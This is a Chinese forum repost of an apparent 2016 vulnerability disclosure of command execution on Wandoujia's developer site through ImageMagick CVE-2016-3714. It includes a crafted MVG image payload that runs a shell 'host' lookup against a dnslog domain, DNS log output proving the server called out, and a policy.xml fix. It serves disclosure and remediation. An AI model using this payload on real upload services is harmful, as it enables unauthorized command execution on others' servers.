HanDs
NO.2

[7月漏洞公开] 豌豆荚某站命令执行 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

之前的都没有修貌似

详细说明:

CVE-2016-3714 以及新的绕过方式



参考:http://drops.wooyun.org/papers/15589



http://blog.knownsec.com/2016/05/imagemagick-popen-remote-command-execution-vulnerability/



开发者站点

http://open.wandoujia.com/account/info

QQ20160531-0.png



认证开发者,营业执照上传处,上传构造好的图片



code 区域
push graphic-context
viewbox 0 0 640 480
image Over 0,0 0,0 '|host zzz.zzz.dnslog.info'
pop graphic-context





漏洞证明:

cloudeye中监测到的请求



code 区域
31-May-2016 22:23:06.450 queries: client 111.206.15.136#3139 (ag-devcenter0-cnc1.hlg01.xxx.dnslog.info): query: ag-devcenter0-cnc1.hlg01.xxx.dnslog.info IN A -ED (128.199.200.236)
31-May-2016 22:23:06.631 queries: client 111.206.14.132#38484 (ag-devcenter0-cnc1.hlg01.xxx.dnslog.info): query: ag-devcenter0-cnc1.hlg01.xxx.dnslog.info IN AAAA -ED (128.199.200.236)
31-May-2016 22:23:06.818 queries: client 111.206.14.132#41208 (ag-devcenter0-cnc1.hlg01.xxx.dnslog.info): query: ag-devcenter0-cnc1.hlg01.xxx.dnslog.info IN MX -ED (128.199.200.236)
31-May-2016 22:23:10.717 queries: client 111.206.14.132#62669 (ag-devcenter0-cnc1.hlg01.xxx.dnslog.info): query: ag-devcenter0-cnc1.hlg01.xxx.dnslog.info IN A -ED (128.199.200.236)
31-May-2016 22:23:10.917 queries: client 111.206.15.136#23942 (ag-devcenter0-cnc1.hlg01.xxx.dnslog.info): query: ag-devcenter0-cnc1.hlg01.xxx.dnslog.info IN AAAA -ED (128.199.200.236)





ag-devcenter0-cnc1.hlg01 为当前服务器主机名



修复方案:

/etc/ImageMagick/policy.xml中添加如下代码



——



<policymap>

<policy domain="coder" rights="none" pattern="EPHEMERAL" />

<policy domain="coder" rights="none" pattern="URL" />

<policy domain="coder" rights="none" pattern="HTTPS" />

<policy domain="coder" rights="none" pattern="MVG" />

<policy domain="coder" rights="none" pattern="MSL" />

<policy domain="path" rights="none" pattern="|*"/>

</policymap>




学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
豆荚 命令 执行
#1楼
发帖时间:2016-7-16   |   查看数:0   |   回复数:0
游客组